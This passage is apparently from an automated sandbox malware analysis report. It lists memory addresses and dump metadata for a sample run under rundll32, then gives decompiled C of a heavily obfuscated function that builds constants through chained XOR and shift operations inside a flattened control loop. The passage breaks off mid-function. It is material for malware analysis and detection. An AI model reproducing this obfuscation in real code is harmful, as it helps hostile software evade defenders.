                                                                                                                          0x007a3a48
                                                                                                                          0x007a3a4a
                                                                                                                          0x007a3a51
                                                                                                                          0x007a3a51
                                                                                                                          0x00000000
                                                                                                                          0x007a3a51
                                                                                                                          0x007a3a4c
                                                                                                                          0x007a3a4f
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3a4f
                                                                                                                          0x007a3a3e
                                                                                                                          0x00000000
                                                                                                                          0x007a3a3e
                                                                                                                          0x007a3a1d
                                                                                                                          0x007a3a23
                                                                                                                          0x007a3a24
                                                                                                                          0x007a3a26
                                                                                                                          0x00000000
                                                                                                                          0x007a3a26
                                                                                                                          0x007a38ed
                                                                                                                          0x007a38f3
                                                                                                                          0x007a3fd7
                                                                                                                          0x00000000
                                                                                                                          0x007a3fdc
                                                                                                                          0x007a38f9
                                                                                                                          0x007a38ff
                                                                                                                          0x007a3959
                                                                                                                          0x007a3965
                                                                                                                          0x007a398e
                                                                                                                          0x007a3995
                                                                                                                          0x007a399a
                                                                                                                          0x007a39b7
                                                                                                                          0x007a39bd
                                                                                                                          0x007a39d5
                                                                                                                          0x00000000
                                                                                                                          0x007a39da
                                                                                                                          0x007a3901
                                                                                                                          0x007a3907
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3914
                                                                                                                          0x007a3919
                                                                                                                          0x00000000
                                                                                                                          0x007a3919
                                                                                                                          0x007a37a5
                                                                                                                          0x007a3895
                                                                                                                          0x007a389a
                                                                                                                          0x007a389c
                                                                                                                          0x007a38c5
                                                                                                                          0x007a38ce
                                                                                                                          0x007a38d6
                                                                                                                          0x007a389e
                                                                                                                          0x007a38a2
                                                                                                                          0x007a38ab
                                                                                                                          0x007a38b3
                                                                                                                          0x007a38b3
                                                                                                                          0x00000000
                                                                                                                          0x007a389c
                                                                                                                          0x007a37b1
                                                                                                                          0x007a3881
                                                                                                                          0x007a3887
                                                                                                                          0x00000000
                                                                                                                          0x007a3887
                                                                                                                          0x007a37bd
                                                                                                                          0x007a3850
                                                                                                                          0x007a3855
                                                                                                                          0x007a385c
                                                                                                                          0x007a3864
                                                                                                                          0x00000000
                                                                                                                          0x007a3864
                                                                                                                          0x007a37c5
                                                                                                                          0x007a37f6
                                                                                                                          0x007a37fb
                                                                                                                          0x007a3802
                                                                                                                          0x00000000
                                                                                                                          0x007a3802
                                                                                                                          0x007a37cd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a37de
                                                                                                                          0x007a37e5
                                                                                                                          0x00000000
                                                                                                                          0x007a37eb
                                                                                                                          0x007a37eb
                                                                                                                          0x00000000
                                                                                                                          0x007a37eb
                                                                                                                          0x007a37e5
                                                                                                                          0x007a3c13
                                                                                                                          0x007a3c19
                                                                                                                          0x007a3e40
                                                                                                                          0x007a3e46
                                                                                                                          0x007a3edd
                                                                                                                          0x007a3ee3
                                                                                                                          0x007a3f9b
                                                                                                                          0x007a3fa0
                                                                                                                          0x007a3fa2
                                                                                                                          0x007a3e13
                                                                                                                          0x007a3e13
                                                                                                                          0x00000000
                                                                                                                          0x007a3e13
                                                                                                                          0x007a3fa8
                                                                                                                          0x00000000
                                                                                                                          0x007a3fa8
                                                                                                                          0x007a3ee9
                                                                                                                          0x007a3eef
                                                                                                                          0x007a3f21
                                                                                                                          0x007a3f28
                                                                                                                          0x007a3f89
                                                                                                                          0x007a3f89
                                                                                                                          0x00000000
                                                                                                                          0x007a3f89
                                                                                                                          0x007a3f38
                                                                                                                          0x007a3f54
                                                                                                                          0x007a3f5b
                                                                                                                          0x007a3f60
                                                                                                                          0x007a3f63
                                                                                                                          0x007a3f6a
                                                                                                                          0x007a3f84
                                                                                                                          0x00000000
                                                                                                                          0x007a3f84
                                                                                                                          0x007a3f6c
                                                                                                                          0x00000000
                                                                                                                          0x007a3f6c
                                                                                                                          0x007a3ef1
                                                                                                                          0x007a3ef7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3f0b
                                                                                                                          0x007a3f10
                                                                                                                          0x007a3f17
                                                                                                                          0x00000000
                                                                                                                          0x007a3f17
                                                                                                                          0x007a3e4c
                                                                                                                          0x007a3ec6
                                                                                                                          0x007a3ecb
                                                                                                                          0x007a3ecd
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a3ed3
                                                                                                                          0x00000000
                                                                                                                          0x007a3ed3
                                                                                                                          0x007a3e4e

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                          • API String ID: 0-2742041174
                                                                                                                          • Opcode ID: b030cfe2e4e31aabf6ae55016cd30a8e2273e9e0ced223e62aac66ec3c676f22
                                                                                                                          • Instruction ID: 8bc3741587ab14aa21604509c7ebe3d2b0f049a36d1bb9320c65522749dd8d87
                                                                                                                          • Opcode Fuzzy Hash: b030cfe2e4e31aabf6ae55016cd30a8e2273e9e0ced223e62aac66ec3c676f22
                                                                                                                          • Instruction Fuzzy Hash: 87C2F271509380CBD378DF25C58AACBBBE1BBC5314F108A1DE5DA9A260DBB59948CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E00792BD9(intOrPtr __ecx) {
                                                                                                                          				char _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				char _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				char* _v60;
                                                                                                                          				intOrPtr _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				intOrPtr _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				char _v80;
                                                                                                                          				intOrPtr _v84;
                                                                                                                          				char _v88;
                                                                                                                          				char _v92;
                                                                                                                          				char _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				signed int _v152;
                                                                                                                          				signed int _v156;
                                                                                                                          				signed int _v160;
                                                                                                                          				signed int _v164;
                                                                                                                          				signed int _v168;
                                                                                                                          				signed int _v172;
                                                                                                                          				signed int _v176;
                                                                                                                          				signed int _v180;
                                                                                                                          				signed int _v184;
                                                                                                                          				unsigned int _v188;
                                                                                                                          				signed int _v192;
                                                                                                                          				signed int _v196;
                                                                                                                          				signed int _v200;
                                                                                                                          				signed int _v204;
                                                                                                                          				signed int _v208;
                                                                                                                          				signed int _v212;
                                                                                                                          				signed int _v216;
                                                                                                                          				signed int _v220;
                                                                                                                          				signed int _v224;
                                                                                                                          				signed int _v228;
                                                                                                                          				signed int _v232;
                                                                                                                          				signed int _v236;
                                                                                                                          				signed int _v240;
                                                                                                                          				signed int _v244;
                                                                                                                          				signed int _v248;
                                                                                                                          				signed int _v252;
                                                                                                                          				signed int _v256;
                                                                                                                          				signed int _v260;
                                                                                                                          				signed int _v264;
                                                                                                                          				signed int _v268;
                                                                                                                          				signed int _v272;
                                                                                                                          				signed int _v276;
                                                                                                                          				signed int _v280;
                                                                                                                          				signed int _v284;
                                                                                                                          				signed int _v288;
                                                                                                                          				signed int _v292;
                                                                                                                          				signed int _v296;
                                                                                                                          				signed int _v300;
                                                                                                                          				signed int _v304;
                                                                                                                          				signed int _v308;
                                                                                                                          				signed int _v312;
                                                                                                                          				signed int _v316;
                                                                                                                          				signed int _v320;
                                                                                                                          				signed int _v324;
                                                                                                                          				signed int _v328;
                                                                                                                          				signed int _v332;
                                                                                                                          				signed int _v336;
                                                                                                                          				signed int _v340;
                                                                                                                          				signed int _v344;
                                                                                                                          				signed int _v348;
                                                                                                                          				signed int _v352;
                                                                                                                          				signed int _v356;
                                                                                                                          				signed int _v360;
                                                                                                                          				signed int _v364;
                                                                                                                          				signed int _v368;
                                                                                                                          				signed int _v372;
                                                                                                                          				signed int _v376;
                                                                                                                          				signed int _v380;
                                                                                                                          				signed int _v384;
                                                                                                                          				signed int _v388;
                                                                                                                          				signed int _v392;
                                                                                                                          				signed int _v396;
                                                                                                                          				void* _t716;
                                                                                                                          				void* _t717;
                                                                                                                          				void* _t718;
                                                                                                                          				intOrPtr _t730;
                                                                                                                          				intOrPtr _t732;
                                                                                                                          				void* _t733;
                                                                                                                          				signed int _t735;
                                                                                                                          				void* _t741;
                                                                                                                          				intOrPtr _t746;
                                                                                                                          				intOrPtr _t752;
                                                                                                                          				intOrPtr _t754;
                                                                                                                          				intOrPtr _t755;
                                                                                                                          				void* _t757;
                                                                                                                          				void* _t759;
                                                                                                                          				intOrPtr _t760;
                                                                                                                          				void* _t766;
                                                                                                                          				signed int _t772;
                                                                                                                          				signed int _t773;
                                                                                                                          				signed int _t774;
                                                                                                                          				signed int _t775;
                                                                                                                          				signed int _t776;
                                                                                                                          				signed int _t777;
                                                                                                                          				signed int _t778;
                                                                                                                          				signed int _t779;
                                                                                                                          				signed int _t780;
                                                                                                                          				signed int _t781;
                                                                                                                          				signed int _t782;
                                                                                                                          				void* _t783;
                                                                                                                          				intOrPtr _t792;
                                                                                                                          				void* _t807;
                                                                                                                          				void* _t812;
                                                                                                                          				void* _t842;
                                                                                                                          				intOrPtr _t848;
                                                                                                                          				void* _t864;
                                                                                                                          				intOrPtr _t866;
                                                                                                                          				signed int _t867;
                                                                                                                          				void* _t868;
                                                                                                                          				void* _t873;
                                                                                                                          				signed int* _t875;
                                                                                                                          				void* _t878;
                                                                                                                          
                                                                                                                          				_t875 =  &_v396;
                                                                                                                          				_v56 = 0xa0cd19;
                                                                                                                          				_t873 = 0;
                                                                                                                          				_v84 = __ecx;
                                                                                                                          				_v52 = _v52 & 0;
                                                                                                                          				_t766 = 0x41de8e2;
                                                                                                                          				_v48 = _v48 & 0;
                                                                                                                          				_v300 = 0x1109eb;
                                                                                                                          				_v300 = _v300 + 0xcb;
                                                                                                                          				_v300 = _v300 | 0xecff95c2;
                                                                                                                          				_v300 = _v300 ^ 0xa1bddbbd;
                                                                                                                          				_v252 = 0xe28eec;
                                                                                                                          				_v252 = _v252 + 0x19d6;
                                                                                                                          				_v252 = _v252 | 0xcaf404bd;
                                                                                                                          				_v252 = _v252 ^ 0xcaf6acfe;
                                                                                                                          				_v124 = 0x517500;
                                                                                                                          				_v124 = _v124 + 0x84ec;
                                                                                                                          				_v124 = _v124 ^ 0x0051f9ec;
                                                                                                                          				_v344 = 0xbde49;
                                                                                                                          				_t772 = 0x31;
                                                                                                                          				_v344 = _v344 * 0x35;
                                                                                                                          				_v344 = _v344 << 9;
                                                                                                                          				_v344 = _v344 + 0x7afe;
                                                                                                                          				_v344 = _v344 ^ 0xea0ab4fe;
                                                                                                                          				_v232 = 0xd06c4e;
                                                                                                                          				_v232 = _v232 | 0x98bd8447;
                                                                                                                          				_v232 = _v232 + 0xffff492f;
                                                                                                                          				_v232 = _v232 ^ 0x98fd357e;
                                                                                                                          				_v236 = 0xf2a19d;
                                                                                                                          				_v236 = _v236 << 8;
                                                                                                                          				_v236 = _v236 | 0xeb063d66;
                                                                                                                          				_v236 = _v236 ^ 0xfba7bd66;
                                                                                                                          				_v304 = 0x7cba75;
                                                                                                                          				_v304 = _v304 << 0x10;
                                                                                                                          				_v304 = _v304 >> 0xd;
                                                                                                                          				_v304 = _v304 ^ 0x0005d3a8;
                                                                                                                          				_v220 = 0xced2db;
                                                                                                                          				_v220 = _v220 >> 0xb;
                                                                                                                          				_v220 = _v220 * 0x6a;
                                                                                                                          				_v220 = _v220 ^ 0x000ab444;
                                                                                                                          				_v356 = 0x98a5e4;
                                                                                                                          				_v356 = _v356 ^ 0xdd9204f6;
                                                                                                                          				_v356 = _v356 | 0x4689a95f;
                                                                                                                          				_v356 = _v356 * 0x48;
                                                                                                                          				_v356 = _v356 ^ 0xdf47a2b8;
                                                                                                                          				_v292 = 0x99ac6b;
                                                                                                                          				_v292 = _v292 * 0x35;
                                                                                                                          				_v292 = _v292 / _t772;
                                                                                                                          				_v292 = _v292 ^ 0x00a637e1;
                                                                                                                          				_v348 = 0x8d86f8;
                                                                                                                          				_v348 = _v348 + 0x9ec9;
                                                                                                                          				_v348 = _v348 + 0xfffff441;
                                                                                                                          				_v348 = _v348 * 0x3a;
                                                                                                                          				_v348 = _v348 ^ 0x2031e474;
                                                                                                                          				_v208 = 0x39dd97;
                                                                                                                          				_v208 = _v208 << 0x10;
                                                                                                                          				_v208 = _v208 + 0x9a19;
                                                                                                                          				_v208 = _v208 ^ 0xdd979a19;
                                                                                                                          				_v100 = 0xd2197;
                                                                                                                          				_v100 = _v100 + 0x97e4;
                                                                                                                          				_v100 = _v100 ^ 0x000db95b;
                                                                                                                          				_v324 = 0x771ce;
                                                                                                                          				_v324 = _v324 << 1;
                                                                                                                          				_v324 = _v324 ^ 0x580a954c;
                                                                                                                          				_v324 = _v324 ^ 0x580cba62;
                                                                                                                          				_v352 = 0xd79a55;
                                                                                                                          				_t867 = 0x4d;
                                                                                                                          				_v352 = _v352 / _t867;
                                                                                                                          				_v352 = _v352 << 5;
                                                                                                                          				_v352 = _v352 + 0xffffa0ed;
                                                                                                                          				_v352 = _v352 ^ 0x005b1fb1;
                                                                                                                          				_v264 = 0xbc6795;
                                                                                                                          				_v264 = _v264 + 0x99f5;
                                                                                                                          				_v264 = _v264 | 0xde86e00c;
                                                                                                                          				_v264 = _v264 ^ 0xdeb9ffad;
                                                                                                                          				_v240 = 0x2649df;
                                                                                                                          				_v240 = _v240 + 0x8f57;
                                                                                                                          				_v240 = _v240 + 0xffffdcf3;
                                                                                                                          				_v240 = _v240 ^ 0x002859eb;
                                                                                                                          				_v180 = 0x284ff;
                                                                                                                          				_v180 = _v180 + 0xfffffbe4;
                                                                                                                          				_v180 = _v180 ^ 0x0004b053;
                                                                                                                          				_v248 = 0x43d81c;
                                                                                                                          				_t773 = 0x2c;
                                                                                                                          				_v248 = _v248 * 0x30;
                                                                                                                          				_v248 = _v248 + 0x77f1;
                                                                                                                          				_v248 = _v248 ^ 0x0cb65cea;
                                                                                                                          				_v164 = 0x561af9;
                                                                                                                          				_v164 = _v164 * 0x5f;
                                                                                                                          				_v164 = _v164 ^ 0x1ff767f2;
                                                                                                                          				_v172 = 0x424117;
                                                                                                                          				_v172 = _v172 / _t773;
                                                                                                                          				_v172 = _v172 ^ 0x000edcdb;
                                                                                                                          				_v336 = 0xedf003;
                                                                                                                          				_v336 = _v336 + 0xffff11da;
                                                                                                                          				_v336 = _v336 >> 2;
                                                                                                                          				_v336 = _v336 >> 9;
                                                                                                                          				_v336 = _v336 ^ 0x000c05d4;
                                                                                                                          				_v216 = 0xec53cc;
                                                                                                                          				_v216 = _v216 | 0x30e2710b;
                                                                                                                          				_v216 = _v216 * 0x1f;
                                                                                                                          				_v216 = _v216 ^ 0xeced0588;
                                                                                                                          				_v224 = 0xc36dcc;
                                                                                                                          				_v224 = _v224 * 0x64;
                                                                                                                          				_v224 = _v224 * 0xc;
                                                                                                                          				_v224 = _v224 ^ 0x9413d5fd;
                                                                                                                          				_v148 = 0x5fde01;
                                                                                                                          				_v148 = _v148 ^ 0x51967584;
                                                                                                                          				_v148 = _v148 ^ 0x51c7dbee;
                                                                                                                          				_v156 = 0x26546c;
                                                                                                                          				_v156 = _v156 ^ 0x8ec08bcd;
                                                                                                                          				_v156 = _v156 ^ 0x8eeee361;
                                                                                                                          				_v396 = 0x210674;
                                                                                                                          				_v396 = _v396 ^ 0xb585172f;
                                                                                                                          				_v396 = _v396 >> 9;
                                                                                                                          				_v396 = _v396 ^ 0x5fa8c9ed;
                                                                                                                          				_v396 = _v396 ^ 0x5ff25ba7;
                                                                                                                          				_v112 = 0xa4fdb5;
                                                                                                                          				_v112 = _v112 ^ 0x7ac22777;
                                                                                                                          				_v112 = _v112 ^ 0x7a606cfd;
                                                                                                                          				_v160 = 0x7fe066;
                                                                                                                          				_v160 = _v160 | 0xe6d7910f;
                                                                                                                          				_v160 = _v160 ^ 0xe6fe40a3;
                                                                                                                          				_v152 = 0xb045a1;
                                                                                                                          				_v152 = _v152 ^ 0x0733bf74;
                                                                                                                          				_v152 = _v152 ^ 0x078d93a6;
                                                                                                                          				_v384 = 0x7bd524;
                                                                                                                          				_v384 = _v384 + 0xffff236c;
                                                                                                                          				_v384 = _v384 * 0x7b;
                                                                                                                          				_v384 = _v384 + 0xffffb98b;
                                                                                                                          				_v384 = _v384 ^ 0x3b1735e1;
                                                                                                                          				_v392 = 0x61d9a1;
                                                                                                                          				_v392 = _v392 + 0xab93;
                                                                                                                          				_v392 = _v392 + 0xffff054c;
                                                                                                                          				_v392 = _v392 | 0xc62dc39c;
                                                                                                                          				_v392 = _v392 ^ 0xc661791a;
                                                                                                                          				_v376 = 0x1528d1;
                                                                                                                          				_v376 = _v376 << 8;
                                                                                                                          				_v376 = _v376 + 0xffff31a1;
                                                                                                                          				_v376 = _v376 >> 9;
                                                                                                                          				_v376 = _v376 ^ 0x000f3b72;
                                                                                                                          				_v268 = 0x199e3d;
                                                                                                                          				_v268 = _v268 ^ 0x3c18ecc0;
                                                                                                                          				_v268 = _v268 >> 0xf;
                                                                                                                          				_v268 = _v268 ^ 0x00085298;
                                                                                                                          				_v116 = 0x9d324d;
                                                                                                                          				_t774 = 0x5b;
                                                                                                                          				_v116 = _v116 * 0x35;
                                                                                                                          				_v116 = _v116 ^ 0x2088a224;
                                                                                                                          				_v144 = 0xea008e;
                                                                                                                          				_v144 = _v144 * 0x31;
                                                                                                                          				_v144 = _v144 ^ 0x2cc3d943;
                                                                                                                          				_v200 = 0xbe23d7;
                                                                                                                          				_v200 = _v200 / _t774;
                                                                                                                          				_v200 = _v200 ^ 0x0006a720;
                                                                                                                          				_v368 = 0xbc3a01;
                                                                                                                          				_v368 = _v368 >> 2;
                                                                                                                          				_v368 = _v368 << 1;
                                                                                                                          				_v368 = _v368 | 0x91e27348;
                                                                                                                          				_v368 = _v368 ^ 0x91f48308;
                                                                                                                          				_v312 = 0x81ba05;
                                                                                                                          				_v312 = _v312 ^ 0x6d6d273d;
                                                                                                                          				_v312 = _v312 + 0x9af1;
                                                                                                                          				_v312 = _v312 ^ 0x6ded9aad;
                                                                                                                          				_v320 = 0xa9a2ca;
                                                                                                                          				_v320 = _v320 / _t867;
                                                                                                                          				_t775 = 0x39;
                                                                                                                          				_v320 = _v320 / _t775;
                                                                                                                          				_v320 = _v320 ^ 0x0005ef3e;
                                                                                                                          				_v136 = 0x8e55db;
                                                                                                                          				_t776 = 0xb;
                                                                                                                          				_v136 = _v136 / _t776;
                                                                                                                          				_v136 = _v136 ^ 0x00010f6d;
                                                                                                                          				_v296 = 0x9a02a3;
                                                                                                                          				_v296 = _v296 | 0xc0bbeea6;
                                                                                                                          				_v296 = _v296 ^ 0xfebfff47;
                                                                                                                          				_v296 = _v296 ^ 0x3e0de8e7;
                                                                                                                          				_v196 = 0x628794;
                                                                                                                          				_v196 = _v196 >> 7;
                                                                                                                          				_v196 = _v196 ^ 0x00033c53;
                                                                                                                          				_v360 = 0xc75687;
                                                                                                                          				_t777 = 0x55;
                                                                                                                          				_v360 = _v360 / _t777;
                                                                                                                          				_t778 = 0x4a;
                                                                                                                          				_v360 = _v360 / _t778;
                                                                                                                          				_t779 = 0x66;
                                                                                                                          				_v360 = _v360 / _t779;
                                                                                                                          				_v360 = _v360 ^ 0x0006bc1c;
                                                                                                                          				_v288 = 0xb89ddb;
                                                                                                                          				_t780 = 0x5c;
                                                                                                                          				_v288 = _v288 * 0x7b;
                                                                                                                          				_v288 = _v288 + 0x220a;
                                                                                                                          				_v288 = _v288 ^ 0x58b2320e;
                                                                                                                          				_v108 = 0x352a49;
                                                                                                                          				_v108 = _v108 | 0x42677ea4;
                                                                                                                          				_v108 = _v108 ^ 0x427d3f06;
                                                                                                                          				_v332 = 0x1123f9;
                                                                                                                          				_v332 = _v332 + 0xfffffbdd;
                                                                                                                          				_v332 = _v332 + 0xffff8b7f;
                                                                                                                          				_v332 = _v332 | 0xcf6269e1;
                                                                                                                          				_v332 = _v332 ^ 0xcf7a63e7;
                                                                                                                          				_v192 = 0x15ba5c;
                                                                                                                          				_v192 = _v192 + 0xffff7d63;
                                                                                                                          				_v192 = _v192 ^ 0x0011de47;
                                                                                                                          				_v204 = 0xd88287;
                                                                                                                          				_v204 = _v204 >> 1;
                                                                                                                          				_v204 = _v204 ^ 0x006fcfd9;
                                                                                                                          				_v308 = 0x394063;
                                                                                                                          				_v308 = _v308 | 0x23438f89;
                                                                                                                          				_v308 = _v308 ^ 0x95557e79;
                                                                                                                          				_v308 = _v308 ^ 0xb625da34;
                                                                                                                          				_v260 = 0x6632ca;
                                                                                                                          				_v260 = _v260 << 0xc;
                                                                                                                          				_v260 = _v260 / _t780;
                                                                                                                          				_v260 = _v260 ^ 0x011a1b64;
                                                                                                                          				_v316 = 0x1ead1d;
                                                                                                                          				_v316 = _v316 >> 0xf;
                                                                                                                          				_v316 = _v316 << 0xe;
                                                                                                                          				_v316 = _v316 ^ 0x000acc6a;
                                                                                                                          				_v388 = 0xc01c7d;
                                                                                                                          				_v388 = _v388 >> 9;
                                                                                                                          				_v388 = _v388 | 0xa159bc3f;
                                                                                                                          				_v388 = _v388 ^ 0x1058b9c4;
                                                                                                                          				_v388 = _v388 ^ 0xb10bd724;
                                                                                                                          				_v256 = 0x2459a9;
                                                                                                                          				_v256 = _v256 + 0xffff58c0;
                                                                                                                          				_v256 = _v256 >> 0xc;
                                                                                                                          				_v256 = _v256 ^ 0x000386a3;
                                                                                                                          				_v340 = 0xa38d0b;
                                                                                                                          				_t781 = 0x78;
                                                                                                                          				_v340 = _v340 / _t781;
                                                                                                                          				_v340 = _v340 ^ 0x3e3bd45c;
                                                                                                                          				_v340 = _v340 + 0xf3c0;
                                                                                                                          				_v340 = _v340 ^ 0x3e3a819a;
                                                                                                                          				_v380 = 0x2dd945;
                                                                                                                          				_v380 = _v380 << 4;
                                                                                                                          				_v380 = _v380 + 0xffffb7c2;
                                                                                                                          				_v380 = _v380 << 6;
                                                                                                                          				_v380 = _v380 ^ 0xb75574a7;
                                                                                                                          				_v272 = 0xf6939e;
                                                                                                                          				_v272 = _v272 | 0x851c2f86;
                                                                                                                          				_v272 = _v272 + 0xffff0412;
                                                                                                                          				_v272 = _v272 ^ 0x85fd1a3b;
                                                                                                                          				_v188 = 0x2c17e;
                                                                                                                          				_v188 = _v188 >> 3;
                                                                                                                          				_v188 = _v188 ^ 0x000c5ae0;
                                                                                                                          				_v280 = 0xf08b81;
                                                                                                                          				_v280 = _v280 | 0x75266007;
                                                                                                                          				_v280 = _v280 ^ 0xc75f894a;
                                                                                                                          				_v280 = _v280 ^ 0xb2a4e63e;
                                                                                                                          				_v372 = 0x6f48a0;
                                                                                                                          				_v372 = _v372 << 0xa;
                                                                                                                          				_v372 = _v372 >> 0x10;
                                                                                                                          				_v372 = _v372 | 0x5e122b7b;
                                                                                                                          				_v372 = _v372 ^ 0x5e16ce05;
                                                                                                                          				_v184 = 0x747075;
                                                                                                                          				_v184 = _v184 + 0xcea0;
                                                                                                                          				_v184 = _v184 ^ 0x007a5d3b;
                                                                                                                          				_v128 = 0x4ebeca;
                                                                                                                          				_v128 = _v128 + 0xffffee54;
                                                                                                                          				_v128 = _v128 ^ 0x004a846f;
                                                                                                                          				_v120 = 0xe78fe5;
                                                                                                                          				_t868 = 0x80c65ec;
                                                                                                                          				_v120 = _v120 + 0xffff4f7b;
                                                                                                                          				_t864 = 0xf9e92c1;
                                                                                                                          				_v120 = _v120 ^ 0x00e2ece2;
                                                                                                                          				_v276 = 0xe2917e;
                                                                                                                          				_v276 = _v276 << 6;
                                                                                                                          				_v276 = _v276 + 0xffff0dfb;
                                                                                                                          				_v276 = _v276 ^ 0x38a72339;
                                                                                                                          				_v176 = 0x1ec236;
                                                                                                                          				_v176 = _v176 ^ 0x7af5486d;
                                                                                                                          				_v176 = _v176 ^ 0x7aeb8f45;
                                                                                                                          				_v244 = 0x4d92e1;
                                                                                                                          				_t782 = 0x5f;
                                                                                                                          				_v88 = 0x20;
                                                                                                                          				_v244 = _v244 * 0x4a;
                                                                                                                          				_v244 = _v244 | 0x7c3f7c28;
                                                                                                                          				_v244 = _v244 ^ 0x7e7c1ac2;
                                                                                                                          				_v284 = 0xc8aa60;
                                                                                                                          				_v284 = _v284 + 0x32b9;
                                                                                                                          				_v284 = _v284 + 0xffff127a;
                                                                                                                          				_v284 = _v284 ^ 0x00c1b775;
                                                                                                                          				_v228 = 0x32f957;
                                                                                                                          				_v228 = _v228 << 0xa;
                                                                                                                          				_v228 = _v228 ^ 0xe304a089;
                                                                                                                          				_v228 = _v228 ^ 0x28edcf32;
                                                                                                                          				_v364 = 0x1a55e7;
                                                                                                                          				_v364 = _v364 * 0x68;
                                                                                                                          				_v364 = _v364 * 0x36;
                                                                                                                          				_v364 = _v364 ^ 0xa842ca33;
                                                                                                                          				_v364 = _v364 ^ 0xe9f59c27;
                                                                                                                          				_v168 = 0x34b570;
                                                                                                                          				_v168 = _v168 | 0x6b6928c5;
                                                                                                                          				_v168 = _v168 ^ 0x6b739674;
                                                                                                                          				_v104 = 0x8a8082;
                                                                                                                          				_v104 = _v104 * 0x3f;
                                                                                                                          				_v104 = _v104 ^ 0x2214377a;
                                                                                                                          				_v212 = 0x18307b;
                                                                                                                          				_v212 = _v212 ^ 0x4b6e1055;
                                                                                                                          				_v212 = _v212 ^ 0x41119872;
                                                                                                                          				_v212 = _v212 ^ 0x0a6c434c;
                                                                                                                          				_v132 = 0x8b3f3c;
                                                                                                                          				_v132 = _v132 << 2;
                                                                                                                          				_v132 = _v132 ^ 0x022c35f2;
                                                                                                                          				_v328 = 0x314aa5;
                                                                                                                          				_v328 = _v328 | 0xbabb419f;
                                                                                                                          				_v328 = _v328 / _t782;
                                                                                                                          				_v328 = _v328 + 0xe73f;
                                                                                                                          				_v328 = _v328 ^ 0x01f1132e;
                                                                                                                          				_v140 = 0x403514;
                                                                                                                          				_v140 = _v140 + 0xffff4e06;
                                                                                                                          				_v140 = _v140 ^ 0x0039264a;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t783 = 0xf0ee26a;
                                                                                                                          					_t842 = 0xbf4f028;
                                                                                                                          					_t716 = 0xc1f5c56;
                                                                                                                          					do {
                                                                                                                          						while(1) {
                                                                                                                          							L2:
                                                                                                                          							_t878 = _t766 - _t716;
                                                                                                                          							if(_t878 > 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							if(_t878 == 0) {
                                                                                                                          								_push(_v160);
                                                                                                                          								_push(_v112);
                                                                                                                          								_t732 = E007ADCF7(_v396, 0x791884, __eflags);
                                                                                                                          								_push(_v392);
                                                                                                                          								_t866 = _t732;
                                                                                                                          								_push(_v384);
                                                                                                                          								_t733 = E007ADCF7(_v152, 0x791924, __eflags);
                                                                                                                          								_v76 = _v124;
                                                                                                                          								_t735 = E0079CB52(_v376, _t866, _v268, _v116, _v144);
                                                                                                                          								_v68 = _v68 & 0x00000000;
                                                                                                                          								_v72 = _t866;
                                                                                                                          								_v80 = 2 + _t735 * 2;
                                                                                                                          								_v60 =  &_v80;
                                                                                                                          								_v92 = _v88;
                                                                                                                          								_v64 = 1;
                                                                                                                          								_t741 = E00798D13( &_v32, _v200, _v368,  &_v92, _v84, _t733, _v312,  &_v68, _v88, _v320, _v136, _v236);
                                                                                                                          								_t875 =  &(_t875[0x11]);
                                                                                                                          								__eflags = _t741 - _v304;
                                                                                                                          								_t766 =  ==  ? 0xbf4f028 : 0xf9e92c1;
                                                                                                                          								E0079A8B0(_v296, _t866, _v196);
                                                                                                                          								E0079A8B0(_v360, _t733, _v288);
                                                                                                                          								_t864 = 0xf9e92c1;
                                                                                                                          								goto L24;
                                                                                                                          							} else {
                                                                                                                          								if(_t766 == 0xdec32e) {
                                                                                                                          									_t746 =  *0x7b3dfc; // 0x0
                                                                                                                          									E007A8519(_v104, _v212,  *((intOrPtr*)(_t746 + 0x50)));
                                                                                                                          									_t766 = _t864;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										_t783 = 0xf0ee26a;
                                                                                                                          										_t842 = 0xbf4f028;
                                                                                                                          										_t716 = 0xc1f5c56;
                                                                                                                          										goto L2;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									if(_t766 == 0x41de8e2) {
                                                                                                                          										_t766 = 0xe078043;
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										if(_t766 == _t868) {
                                                                                                                          											_push(_v128);
                                                                                                                          											_push(_v184);
                                                                                                                          											_t871 = E007ADCF7(_v372, 0x791904, __eflags);
                                                                                                                          											_t585 =  &_v300; // 0x3e0de8e7
                                                                                                                          											_v44 =  *_t585;
